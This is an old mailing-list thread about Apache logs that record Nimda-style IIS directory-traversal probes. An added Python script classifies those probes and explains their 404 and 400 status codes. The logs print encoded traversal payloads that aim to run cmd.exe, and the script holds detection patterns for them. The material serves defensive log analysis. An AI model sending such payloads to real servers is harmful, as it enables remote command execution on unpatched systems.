
Re: Bizarre apache logs



Looks like part of the Nimda virus that's rampant. It's looking for exploitable 
holes in IIS. Since you're running apache, I don't believe you have much to 
worry about.

There are some Apache modules out there that you can install that will take the 
IP address from your log when they see things like this, do an ARIN lookup on it, 
and send an email to the abuse and hostmaster contacts of the company that owns that block. 


On Sun, 6 Oct 2002, Marcel Weber wrote:

> Hi
> 
> I had some bizarre 404 entries in my apache logs. They are very rare, but it
> looks as if they resulted from an attempted attack. Well, say it was a rather
> lame attack, but I wonder where the 404 and 400 came from. As the server is
> configured, there should be only 403 answers, as the whole http part is
> closed, except for one directory and from the intranet. From the outside one
> can access the server via https only.
> 
> I don't know if I have to be alerted or something, but I would feel better
> if someone could check my set up. Just for making sure, that it is not a
> misconfiguration. The server is an older Compaq Proliant 800, some Pentium
> 133 MHz. Rather slow, perhaps this has an influence.
> 
> Below are the error.log and access.log in question and at the end the
> relevant section of the httpd.conf.
> 
> Regards
> 
> Marcel
> 
> 
> ############################################################################
> ###
> access.log: I put some newlines between the 404 and the rest of it.
> 
> 80.240.96.146 - - [29/Sep/2002:12:50:03 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 286 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 284 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 294 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 294 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 341 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
> 
> 
> 80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> 
> 
> 80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
> 
> ###########################################################################
> In the error.log there are following entries:
> 
> [Sun Sep 29 12:50:03 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
> [Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/MSADC
> [Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/c
> [Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/d
> [Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
> [Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/_vti_bin
> [Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/_mem_bin
> [Sun Sep 29 12:50:06 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/msadc
> [Sun Sep 29 12:50:06 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
> [Sun Sep 29 12:50:07 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
> [Sun Sep 29 12:50:07 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
> [Sun Sep 29 12:50:08 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
> [Sun Sep 29 12:50:08 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
> 
> ###########################################################################
> 
> Here comes my httpd.conf
> 
> <Location />
>        Order allow,deny
>        deny from all
> </Location>
> 
> 
> <VirtualHost _default_:80>
>         ServerName      xxx.foo.com
>         ServerAlias     xxx.faa.com
> 
> 
> <Location />
>       Order allow,deny
>       allow from 192.x.x.0/24  # allow access only from the intranet
> 
>       AuthType Basic
>       AuthName "foo"
>       AuthLDAPBindDN "xxxxxxxxxxxxxxxxxxxxxxxx"
>       AuthLDAPBindPassword "xxxxxxxxxxxxxxxxxxx"
>       AuthLDAPUrl ldap://dddddddddddddddddddddddddddddddddddddd
>       require valid-user
> 
> </Location>
> 
> <Location /public>
>         Order allow,deny
>         allow from all
>         satisfy any
> </Location>
> 
> 
>         <Location /zykadmin>
>                 Order allow,deny
>                 allow from 192.x.x.0/24
>         </Location>
> 
> 
>         <Location /servlets>
>                 Order allow,deny
>                 Allow from 192.x.x.0/24
>         </Location>
> 
>         #### Servlets reachable via http
>         WebAppDeploy examples warpConnection /servlets/examples/
>         WebAppDeploy lagerchargen warpConnection /servlets/agauga/
> 
> </VirtualHost>
> 
> <VirtualHost _default_:443>
>         DocumentRoot    /var/www
>         ServerName      xxx.foo.com
>         ServerAlias 	yyy.faa.com
> 
>         #### Servlets reachable via https
>         WebAppDeploy examples warpConnection /servlets/examples/
>         WebAppDeploy lagerchargen warpConnection /servlets/agauga/
> 
> 
>         <Location />
>                Order allow,deny
>                allow from all
> 
>                 AuthType Basic
>                 AuthName "iiiiiiiiiiiii"
>                 AuthLDAPBindDN "ooooooooooooooooooo"
>                 AuthLDAPBindPassword "xxxxxxxxxx"
>                 AuthLDAPUrl ldap://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
>                 require valid-user
> 
>         </Location>
> 
> 
>         <IfModule mod_ssl.c>
>                   SSLEngine on
>                   SSLCertificateFile    /etc/apache/ssl.crt/server.crt
>                   SSLCertificateKeyFile /etc/apache/ssl.key/server.key
> #                 SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
>         </IfModule>
> </VirtualHost>
> 
> --------------------
> 
> PGP / GPG Key:    http://www.ncpro.com/GPG/mmweber-at-ncpro-com.asc
> 
> 
> 
> 

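An added example, not code from either poster, that reads access.log lines of the shape shown above and answers the two questions in the thread: which file each probe was really aiming at (so the whole burst can be attributed to one worm-style scanner per source IP), and why two of the lines are 404/400 rather than 403. The second part rests on how Apache 1.3's ap_unescape_url behaves: a malformed %-escape such as `%%35` makes it return 400 and an escape that decodes to `/` or NUL (the `%2f` in `%c0%2f`) makes it return 404, both before any `<Location>` access control is consulted, which is why `deny from all` never got to answer those two requests. The "what IIS would have done" decoder (second %-decode pass, overlong two-byte UTF-8 accepted for `/` and `\`) is a deliberately simplified model of the IIS canonicalisation bugs Nimda targets, sufficient to collapse every variant to its intended target. The sample lines are constructed to mirror the post's log; no network lookups (whois/ARIN) are performed so the script runs offline.

```python
import posixpath
import re
from collections import Counter, defaultdict

# Constructed sample, modelled on the access.log in the post (same source IP,
# request shapes and status codes); the last line is a benign request added
# so the filter has something to ignore.
SAMPLE_LOG = """\
80.240.96.146 - - [29/Sep/2002:12:50:03 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 286 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 284 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
10.0.0.7 - - [29/Sep/2002:13:01:00 +0200] "GET /public/index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
"""

# Apache "combined" log format: ip ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)
HEX = set("0123456789abcdefABCDEF")


def apache_unescape(path):
    """Single-pass %XX decoding with the verdict Apache 1.3's ap_unescape_url
    attaches: 400 if any escape is malformed ('%%35'), 404 if any escape decodes
    to '/' or NUL ('%2f'), else None. Both fire before <Location> access control."""
    out, i, bad_escape, bad_path = bytearray(), 0, False, False
    while i < len(path):
        if path[i] != "%":
            out.append(ord(path[i]))
            i += 1
            continue
        pair = path[i + 1:i + 3]
        if len(pair) < 2 or not set(pair) <= HEX:
            bad_escape = True            # keep the literal '%' and move on, as Apache does
            out.append(ord("%"))
            i += 1
            continue
        b = int(pair, 16)
        if b in (0x2F, 0x00):
            bad_path = True
        out.append(b)
        i += 3
    return bytes(out), (400 if bad_escape else 404 if bad_path else None)


def intended_path(target):
    """Simplified model of what unpatched IIS would execute: a second %-decode
    pass (turns %255c into '\\') plus acceptance of overlong two-byte UTF-8 for
    '/' and '\\' (%c0%af, %c1%9c, %c1%1c ...). Backslashes are normalised to '/'."""
    once, _ = apache_unescape(target.split("?", 1)[0])
    twice, _ = apache_unescape(once.decode("latin-1"))
    out, i = bytearray(), 0
    while i < len(twice):
        b = twice[i]
        if b in (0xC0, 0xC1) and i + 1 < len(twice):
            out.append(((b & 0x1F) << 6) | (twice[i + 1] & 0x3F))   # overlong -> ASCII
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1").replace("\\", "/")


PROBE_RE = re.compile(r"/(?:cmd|root)\.exe$", re.IGNORECASE)


def classify(target):
    """Canonical file a Nimda-style probe was after (traversal collapsed), or None."""
    norm = posixpath.normpath(intended_path(target))
    return norm if PROBE_RE.search(norm) else None


def analyze(log_text):
    """Per source IP: probe count, statuses logged, files aimed at, and how many
    requests Apache refused while unescaping (400/404) instead of by access control."""
    report = defaultdict(lambda: {"hits": 0, "statuses": Counter(),
                                  "targets": Counter(), "early_reject": Counter()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        aimed_at = classify(m.group("target"))
        if aimed_at is None:
            continue
        r = report[m.group("ip")]
        r["hits"] += 1
        r["statuses"][int(m.group("status"))] += 1
        r["targets"][aimed_at] += 1
        _, verdict = apache_unescape(m.group("target").split("?", 1)[0])
        if verdict:
            r["early_reject"][verdict] += 1
    return dict(report)


if __name__ == "__main__":
    for ip, r in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {r['hits']} probes, statuses {dict(r['statuses'])}, "
              f"targets {dict(r['targets'])}, refused in unescape {dict(r['early_reject'])}")
```

The per-IP report is the input an abuse-notification module of the kind mentioned in the reply would feed to a whois lookup; on the sample it attributes all six probes to one host, collapses every encoding variant to `/winnt/system32/cmd.exe` or a `root.exe`, and shows that exactly the `%c0%2f` and `%%35%63` requests were refused during unescaping, which is the 404 and 400 the original poster was asking about.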